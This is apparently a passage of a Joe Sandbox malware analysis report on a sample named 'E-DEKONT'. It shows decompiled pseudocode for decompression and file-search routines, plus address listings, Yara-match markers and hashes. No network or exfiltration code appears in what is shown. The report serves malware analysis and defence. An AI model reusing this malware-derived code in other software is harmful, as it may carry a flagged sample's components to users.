				signed int _t251;
				signed int _t254;
				signed int _t256;
				signed int _t259;
				signed int _t262;
				void* _t263;
				void* _t264;
				signed int _t267;
				intOrPtr _t269;
				intOrPtr _t271;
				signed int _t274;
				intOrPtr* _t275;
				unsigned int _t276;
				void* _t277;
				signed int _t278;
				intOrPtr* _t279;
				signed int _t281;
				intOrPtr _t282;
				intOrPtr _t283;
				signed int* _t284;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				intOrPtr _t296;
				signed int* _t297;
				intOrPtr _t298;
				void* _t299;

				_t278 = _a8;
				_t187 = 0x10;
				memset( &_v116, 0, _t187 << 2);
				_t189 = _a4;
				_t233 = _t278;
				do {
					_t166 =  *_t189;
					_t189 =  &(_t189[1]);
					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
					_t233 = _t233 - 1;
				} while (_t233 != 0);
				if(_v116 != _t278) {
					_t279 = _a28;
					_t267 =  *_t279;
					_t190 = 1;
					_a28 = _t267;
					_t234 = 0xf;
					while(1) {
						_t168 = 0;
						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
							break;
						}
						_t190 = _t190 + 1;
						if(_t190 <= _t234) {
							continue;
						}
						break;
					}
					_v8 = _t190;
					if(_t267 < _t190) {
						_a28 = _t190;
					}
					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
						_t234 = _t234 - 1;
						if(_t234 != 0) {
							continue;
						}
						break;
					}
					_v28 = _t234;
					if(_a28 > _t234) {
						_a28 = _t234;
					}
					 *_t279 = _a28;
					_t181 = 1 << _t190;
					while(_t190 < _t234) {
						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
						if(_t182 < 0) {
							L64:
							return _t168 | 0xffffffff;
						}
						_t190 = _t190 + 1;
						_t181 = _t182 + _t182;
					}
					_t281 = _t234 << 2;
					_t191 = _t299 + _t281 - 0x70;
					_t269 =  *_t191;
					_t183 = _t181 - _t269;
					_v52 = _t183;
					if(_t183 < 0) {
						goto L64;
					}
					_v176 = _t168;
					 *_t191 = _t269 + _t183;
					_t192 = 0;
					_t235 = _t234 - 1;
					if(_t235 == 0) {
						L21:
						_t184 = _a4;
						_t271 = 0;
						do {
							_t193 =  *_t184;
							_t184 =  &(_t184[1]);
							if(_t193 != _t168) {
								_t232 = _t299 + _t193 * 4 - 0xb0;
								_t236 =  *_t232;
								 *((intOrPtr*)(0x432170 + _t236 * 4)) = _t271;
								 *_t232 = _t236 + 1;
							}
							_t271 = _t271 + 1;
						} while (_t271 < _a8);
						_v16 = _v16 | 0xffffffff;
						_v40 = _v40 & 0x00000000;
						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
						_t195 = _v8;
						_t186 =  ~_a28;
						_v12 = _t168;
						_v180 = _t168;
						_v36 = 0x432170;
						_v240 = _t168;
						if(_t195 > _v28) {
							L62:
							_t168 = 0;
							if(_v52 == 0 || _v28 == 1) {
								return _t168;
							} else {
								goto L64;
							}
						}
						_v44 = _t195 - 1;
						_v32 = _t299 + _t195 * 4 - 0x70;
						do {
							_t282 =  *_v32;
							if(_t282 == 0) {
								goto L61;
							}
							while(1) {
								_t65 =  &_a28; // 0x432170
								_t283 = _t282 - 1;
								_t200 =  *_t65 + _t186;
								_v48 = _t283;
								_v24 = _t200;
								if(_v8 <= _t200) {
									goto L45;
								}
								L31:
								_v20 = _t283 + 1;
								do {
									_v16 = _v16 + 1;
									_t296 = _v28 - _v24;
									_t74 =  &_a28; // 0x432170
									if(_t296 >  *_t74) {
										_t75 =  &_a28; // 0x432170
										_t296 =  *_t75;
									}
									_t222 = _v8 - _v24;
									_t254 = 1 << _t222;
									if(1 <= _v20) {
										L40:
										_t256 =  *_a36;
										_t168 = 1 << _t222;
										_v40 = 1;
										_t274 = _t256 + 1;
										if(_t274 > 0x5a0) {
											goto L64;
										}
									} else {
										_t275 = _v32;
										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
										if(_t222 >= _t296) {
											goto L40;
										}
										while(1) {
											_t222 = _t222 + 1;
											if(_t222 >= _t296) {
												goto L40;
											}
											_t275 = _t275 + 4;
											_t264 = _t263 + _t263;
											_t175 =  *_t275;
											if(_t264 <= _t175) {
												goto L40;
											}
											_t263 = _t264 - _t175;
										}
										goto L40;
									}
									_t168 = _a32 + _t256 * 4;
									_t297 = _t299 + _v16 * 4 - 0xec;
									 *_a36 = _t274;
									_t259 = _v16;
									 *_t297 = _t168;
									if(_t259 == 0) {
										 *_a24 = _t168;
									} else {
										_t276 = _v12;
										_t298 =  *((intOrPtr*)(_t297 - 4));
										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
										_t98 =  &_a28; // 0x432170
										_a5 =  *_t98;
										_a4 = _t222;
										_t262 = _t276 >> _t186;
										_a6 = (_t168 - _t298 >> 2) - _t262;
										 *(_t298 + _t262 * 4) = _a4;
									}
									_t224 = _v24;
									_t186 = _t224;
									_t107 =  &_a28; // 0x432170
									_t225 = _t224 +  *_t107;
									_v24 = _t225;
								} while (_v8 > _t225);
								L45:
								_t111 =  &_v36; // 0x432170
								_t284 =  *_t111;
								_a5 = _v8 - _t186;
								if(_t284 < 0x432170 + _a8 * 4) {
									_t205 =  *_t284;
									if(_t205 >= _a12) {
										_t207 = _t205 - _a12 + _t205 - _a12;
										_v36 =  &(_v36[1]);
										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
										_t208 =  *((intOrPtr*)(_t207 + _a16));
									} else {
										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
										_t208 =  *_t284;
										_v36 =  &(_t284[1]);
									}
									_a6 = _t208;
								} else {
									_a4 = 0xc0;
								}
								_t286 = 1 << _v8 - _t186;
								_t244 = _v12 >> _t186;
								while(_t244 < _v40) {
									 *(_t168 + _t244 * 4) = _a4;
									_t244 = _t244 + _t286;
								}
								_t287 = _v12;
								_t246 = 1 << _v44;
								while((_t287 & _t246) != 0) {
									_t287 = _t287 ^ _t246;
									_t246 = _t246 >> 1;
								}
								_t288 = _t287 ^ _t246;
								_v20 = 1;
								_v12 = _t288;
								_t251 = _v16;
								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
									L60:
									if(_v48 != 0) {
										_t282 = _v48;
										_t65 =  &_a28; // 0x432170
										_t283 = _t282 - 1;
										_t200 =  *_t65 + _t186;
										_v48 = _t283;
										_v24 = _t200;
										if(_v8 <= _t200) {
											goto L45;
										}
										goto L31;
									}
									break;
								} else {
									goto L58;
								}
								do {
									L58:
									_t186 = _t186 - _a28;
									_t251 = _t251 - 1;
								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
								_v16 = _t251;
								goto L60;
							}
							L61:
							_v8 = _v8 + 1;
							_v32 = _v32 + 4;
							_v44 = _v44 + 1;
						} while (_v8 <= _v28);
						goto L62;
					}
					_t277 = 0;
					do {
						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
						_t277 = _t277 + 4;
						_t235 = _t235 - 1;
						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
					} while (_t235 != 0);
					goto L21;
				}
				 *_a24 =  *_a24 & 0x00000000;
				 *_a28 =  *_a28 & 0x00000000;
				return 0;
			}











































































                                                                            0x004072bf
                                                                            0x004072c7
                                                                            0x004072cb
                                                                            0x004072cd
                                                                            0x004072d0
                                                                            0x004072d2
                                                                            0x004072d2
                                                                            0x004072d4
                                                                            0x004072db
                                                                            0x004072dd
                                                                            0x004072dd
                                                                            0x004072e3
                                                                            0x004072f8
                                                                            0x00407300
                                                                            0x00407302
                                                                            0x00407304
                                                                            0x00407307
                                                                            0x00407308
                                                                            0x00407308
                                                                            0x0040730e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407310
                                                                            0x00407313
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407313
                                                                            0x00407317
                                                                            0x0040731a
                                                                            0x0040731c
                                                                            0x0040731c
                                                                            0x0040731f
                                                                            0x00407325
                                                                            0x00407326
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407326
                                                                            0x0040732b
                                                                            0x0040732e
                                                                            0x00407330
                                                                            0x00407330
                                                                            0x00407336
                                                                            0x00407338
                                                                            0x00407349
                                                                            0x0040733c
                                                                            0x00407340
                                                                            0x004075e5
                                                                            0x00000000
                                                                            0x004075e5
                                                                            0x00407346
                                                                            0x00407347
                                                                            0x00407347
                                                                            0x0040734f
                                                                            0x00407352
                                                                            0x00407356
                                                                            0x00407358
                                                                            0x0040735a
                                                                            0x0040735d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407365
                                                                            0x0040736b
                                                                            0x0040736d
                                                                            0x0040736f
                                                                            0x00407370
                                                                            0x00407385
                                                                            0x00407385
                                                                            0x00407388
                                                                            0x0040738a
                                                                            0x0040738a
                                                                            0x0040738c
                                                                            0x00407391
                                                                            0x00407393
                                                                            0x0040739a
                                                                            0x0040739c
                                                                            0x004073a4
                                                                            0x004073a4
                                                                            0x004073a6
                                                                            0x004073a7
                                                                            0x004073b6
                                                                            0x004073ba
                                                                            0x004073be
                                                                            0x004073c1
                                                                            0x004073c4
                                                                            0x004073c9
                                                                            0x004073cc
                                                                            0x004073d2
                                                                            0x004073d9
                                                                            0x004073df
                                                                            0x004075d8
                                                                            0x004075d8
                                                                            0x004075dd
                                                                            0x004075ec
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004075dd
                                                                            0x004073ec
                                                                            0x004073ef
                                                                            0x004073f2
                                                                            0x004073f5
                                                                            0x004073f9
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407404
                                                                            0x00407404
                                                                            0x00407407
                                                                            0x00407408
                                                                            0x0040740a
                                                                            0x00407410
                                                                            0x00407413
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407419
                                                                            0x0040741a
                                                                            0x0040741d
                                                                            0x00407420
                                                                            0x00407423
                                                                            0x00407426
                                                                            0x00407429
                                                                            0x0040742b
                                                                            0x0040742b
                                                                            0x0040742b
                                                                            0x00407433
                                                                            0x00407437
                                                                            0x0040743c
                                                                            0x00407461
                                                                            0x00407467
                                                                            0x00407469
                                                                            0x0040746b
                                                                            0x0040746e
                                                                            0x00407477
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040743e
                                                                            0x0040743e
                                                                            0x00407447
                                                                            0x0040744b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040745c
                                                                            0x0040745c
                                                                            0x0040745f
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040744f
                                                                            0x00407452
                                                                            0x00407454
                                                                            0x00407458
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040745a
                                                                            0x0040745a
                                                                            0x00000000
                                                                            0x0040745c
                                                                            0x00407480
                                                                            0x00407486
                                                                            0x00407490
                                                                            0x00407492
                                                                            0x00407497
                                                                            0x00407499
                                                                            0x004074cf
                                                                            0x0040749b
                                                                            0x0040749b
                                                                            0x0040749e
                                                                            0x004074a1
                                                                            0x004074a8
                                                                            0x004074ab
                                                                            0x004074ae
                                                                            0x004074b5
                                                                            0x004074c0
                                                                            0x004074c7
                                                                            0x004074c7
                                                                            0x004074d1
                                                                            0x004074d4
                                                                            0x004074d6
                                                                            0x004074d6
                                                                            0x004074dc
                                                                            0x004074dc
                                                                            0x004074e5
                                                                            0x004074e8
                                                                            0x004074e8
                                                                            0x004074ed
                                                                            0x004074fc
                                                                            0x00407504
                                                                            0x00407509
                                                                            0x0040752d
                                                                            0x00407535
                                                                            0x00407539
                                                                            0x0040753f
                                                                            0x0040750b
                                                                            0x00407519
                                                                            0x0040751c
                                                                            0x00407522
                                                                            0x00407522
                                                                            0x00407543
                                                                            0x004074fe
                                                                            0x004074fe
                                                                            0x004074fe
                                                                            0x00407554
                                                                            0x00407558
                                                                            0x00407564
                                                                            0x0040755f
                                                                            0x00407562
                                                                            0x00407562
                                                                            0x0040756c
                                                                            0x00407571
                                                                            0x00407579
                                                                            0x00407575
                                                                            0x00407577
                                                                            0x00407577
                                                                            0x0040757f
                                                                            0x00407581
                                                                            0x00407588
                                                                            0x00407592
                                                                            0x0040759c
                                                                            0x004075b8
                                                                            0x004075bc
                                                                            0x00407401
                                                                            0x00407404
                                                                            0x00407407
                                                                            0x00407408
                                                                            0x0040740a
                                                                            0x00407410
                                                                            0x00407413
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407413
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040759e
                                                                            0x0040759e
                                                                            0x0040759e
                                                                            0x004075a3
                                                                            0x004075ac
                                                                            0x004075b5
                                                                            0x00000000
                                                                            0x004075b5
                                                                            0x004075c2
                                                                            0x004075c2
                                                                            0x004075c5
                                                                            0x004075cc
                                                                            0x004075cf
                                                                            0x00000000
                                                                            0x004073f2
                                                                            0x00407372
                                                                            0x00407374
                                                                            0x00407374
                                                                            0x00407378
                                                                            0x0040737b
                                                                            0x0040737c
                                                                            0x0040737c
                                                                            0x00000000
                                                                            0x00407374
                                                                            0x004072e8
                                                                            0x004072ee
                                                                            0x00000000

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: p!C$p!C
                                                                            • API String ID: 0-3125587631
                                                                            • Opcode ID: b391703ce6aa9d184f83615265780e2503839b4fa6daee6685a5ac04655da8ea
                                                                            • Instruction ID: ef217add9e462a39eaf01b2cd615f348b30b4b8a27c4232395f9688b09cd85c2
                                                                            • Opcode Fuzzy Hash: b391703ce6aa9d184f83615265780e2503839b4fa6daee6685a5ac04655da8ea
                                                                            • Instruction Fuzzy Hash: 33C15831E04219DBDF18CF68C8905EEBBB2BF88314F25826AD85677380D734A942CF95
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02B80D36 Relevance: 1.7, Strings: 1, Instructions: 405COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108852449339.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_2b60000_E-DEKONT.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: qa5
                                                                            • API String ID: 0-2046460547
                                                                            • Opcode ID: 9a54a1260ae600a96ec5e2b28d42ec1dca3035204e32fdc249480b3fab4b8899
                                                                            • Instruction ID: 5c282e4e45e42d61f1b9fcec00cce039fefc397b411f034addcc0cd9cf3e9446
                                                                            • Opcode Fuzzy Hash: 9a54a1260ae600a96ec5e2b28d42ec1dca3035204e32fdc249480b3fab4b8899
                                                                            • Instruction Fuzzy Hash: A7D15B755053429BD72A6E35C95A3E63BA6EF133A4FA844AECCC54F916D33600C6CB42
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00402862 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 39%
                                                                            			E00402862(short __ebx, short* __esi) {
				void* _t21;

				if(FindFirstFileW(E00402C37(2), _t21 - 0x2d4) != 0xffffffff) {
					E004061C9( *((intOrPtr*)(_t21 - 0xc)), _t8);
					_push(_t21 - 0x2a8);
					_push(__esi);
					E00406282();
				} else {
					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t21 - 4)) = 1;
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}




                                                                            0x0040287a
                                                                            0x00402895
                                                                            0x004028a0
                                                                            0x004028a1
                                                                            0x004029db
                                                                            0x0040287c
                                                                            0x0040287f
                                                                            0x00402882
                                                                            0x00402885
                                                                            0x00402885
                                                                            0x00402ac2
                                                                            0x00402ace

                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402871
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: FileFindFirst
                                                                            • String ID:
                                                                            • API String ID: 1974802433-0
                                                                            • Opcode ID: be8520f7ce657d0e4c3fefe716f9cddb98d80e231b03e641be22d0c2c0e6829e
                                                                            • Instruction ID: dc4ef17723f846daade3f6bb5fabbbbae416fabd81b1269148e1e628f00bda2f
                                                                            • Opcode Fuzzy Hash: be8520f7ce657d0e4c3fefe716f9cddb98d80e231b03e641be22d0c2c0e6829e
                                                                            • Instruction Fuzzy Hash: 9DF08271A04104EFD710EBA4DD499ADB378EF00324F2105BBF515F61D1D7B44E449B1A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02B6850C Relevance: 1.4, Strings: 1, Instructions: 197COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108852449339.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_2b60000_E-DEKONT.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: `
                                                                            • API String ID: 0-1850852036
                                                                            • Opcode ID: dc32e7be3f2583e0358fc6d724a8ae74ed89a6614fc2ccc19a9079f01cdd8562
                                                                            • Instruction ID: 9cdfc0321c79803f1ab5bfe95b479b0c22a38c36fa8a10292aefd4854de4eebf
                                                                            • Opcode Fuzzy Hash: dc32e7be3f2583e0358fc6d724a8ae74ed89a6614fc2ccc19a9079f01cdd8562
                                                                            • Instruction Fuzzy Hash: 0851F7A60183C357EB26AD2998293D57BD75F631F5FDC496FCCC91E80BC62610CAC252
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02B684E1 Relevance: 1.4, Strings: 1, Instructions: 128COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108852449339.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_2b60000_E-DEKONT.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: `
                                                                            • API String ID: 0-1850852036
                                                                            • Opcode ID: 3a04cb2afdeb22e04bed30c2695d1b41bd243b0cdd3f6f11399f668be20feea9
                                                                            • Instruction ID: 786bd0c3966ba7291de3bcd148b5158e017b49474ab20a01de842eb88975f56a
                                                                            • Opcode Fuzzy Hash: 3a04cb2afdeb22e04bed30c2695d1b41bd243b0cdd3f6f11399f668be20feea9
                                                                            • Instruction Fuzzy Hash: 88413E715847569BEF309D298E783DF2273AFA23D0F9603698C8967199C738454F8741
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02B8525A Relevance: .5, Instructions: 481COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108852449339.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_2b60000_E-DEKONT.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b637761ae66a15699f6e8725e1f754aca680c8aafa648d37efed9eed69911169
                                                                            • Instruction ID: 2bbde0275eaba3b974653c7364e66afd61888d263ddc3ae1c54d6a37658e9529
                                                                            • Opcode Fuzzy Hash: b637761ae66a15699f6e8725e1f754aca680c8aafa648d37efed9eed69911169
                                                                            • Instruction Fuzzy Hash: 17B16CB327DE182FF11CDA38ACCA97B639EE7C66253A1816FE043D3157E461A8474171
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00406ADD Relevance: .3, Instructions: 334COMMONCrypto
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 79%
                                                                            			E00406ADD(signed int __ebx, signed int* __esi) {
				signed int _t396;
				signed int _t425;
				signed int _t442;
				signed int _t443;
				signed int* _t446;
				void* _t448;

				L0:
				while(1) {
					L0:
					_t446 = __esi;
					_t425 = __ebx;
					if( *(_t448 - 0x34) == 0) {
						break;
					}
					L55:
					__eax =  *(__ebp - 0x38);
					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
					__ecx = __ebx;
					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
					__ebx = __ebx + 8;
					while(1) {
						L56:
						if(__ebx < 0xe) {
							goto L0;
						}
						L57:
						__eax =  *(__ebp - 0x40);
						__eax =  *(__ebp - 0x40) & 0x00003fff;
						__ecx = __eax;
						__esi[1] = __eax;
						__ecx = __eax & 0x0000001f;
						if(__cl > 0x1d) {
							L9:
							_t443 = _t442 | 0xffffffff;
							 *_t446 = 0x11;
							L10:
							_t446[0x147] =  *(_t448 - 0x40);
							_t446[0x146] = _t425;
							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
							L11:
							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
							_t446[0x26ea] =  *(_t448 - 0x30);
							E0040724C( *(_t448 + 8));
							return _t443;
						}
						L58:
						__eax = __eax & 0x000003e0;
						if(__eax > 0x3a0) {
							goto L9;
						}
						L59:
						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
						__ebx = __ebx - 0xe;
						_t94 =  &(__esi[2]);
						 *_t94 = __esi[2] & 0x00000000;
						 *__esi = 0xc;
						while(1) {
							L60:
							__esi[1] = __esi[1] >> 0xa;
							__eax = (__esi[1] >> 0xa) + 4;
							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
								goto L68;
							}
							L61:
							while(1) {
								L64:
								if(__ebx >= 3) {
									break;
								}
								L62:
								if( *(__ebp - 0x34) == 0) {
									goto L183;
								}
								L63:
								__eax =  *(__ebp - 0x38);
								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
								__ecx = __ebx;
								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
								__ebx = __ebx + 8;
							}
							L65:
							__ecx = __esi[2];
							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
							__ebx = __ebx - 3;
							_t108 = __ecx + 0x4084cc; // 0x121110
							__ecx =  *_t108;
							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
							__ecx = __esi[1];
							__esi[2] = __esi[2] + 1;
							__eax = __esi[2];
							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
								goto L64;
							}
							L66:
							while(1) {
								L68:
								if(__esi[2] >= 0x13) {
									break;
								}
								L67:
								_t119 = __esi[2] + 0x4084cc; // 0x4000300
								__eax =  *_t119;
								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
								_t126 =  &(__esi[2]);
								 *_t126 = __esi[2] + 1;
							}
							L69:
							__ecx = __ebp - 8;
							__edi =  &(__esi[0x143]);
							 &(__esi[0x148]) =  &(__esi[0x144]);
							__eax = 0;
							 *(__ebp - 8) = 0;
							__eax =  &(__esi[3]);
							 *__edi = 7;
							__eax = E004072B4( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
							if(__eax != 0) {
								L72:
								 *__esi = 0x11;
								while(1) {
									L181:
									_t396 =  *_t446;
									if(_t396 > 0xf) {
										break;
									}
									L1:
									switch( *((intOrPtr*)(_t396 * 4 +  &M0040720C))) {
										case 0:
											L101:
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[5];
											__esi[2] = __esi[5];
											 *__esi = 1;
											goto L102;
										case 1:
											L102:
											__eax = __esi[3];
											while(1) {
												L105:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L103:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L183;
												}
												L104:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L106:
											__eax =  *(0x40a5a4 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __ecx;
											if(__ecx != 0) {
												L108:
												__eflags = __cl & 0x00000010;
												if((__cl & 0x00000010) == 0) {
													L110:
													__eflags = __cl & 0x00000040;
													if((__cl & 0x00000040) == 0) {
														goto L125;
													}
													L111:
													__eflags = __cl & 0x00000020;
													if((__cl & 0x00000020) == 0) {
														goto L9;
													}
													L112:
													 *__esi = 7;
													goto L181;
												}
												L109:
												__esi[2] = __ecx;
												__esi[1] = __eax;
												 *__esi = 2;
												goto L181;
											}
											L107:
											__esi[2] = __eax;
											 *__esi = 6;
											goto L181;
										case 2:
											L113:
											__eax = __esi[2];
											while(1) {
												L116:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L114:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L183;
												}
												L115:
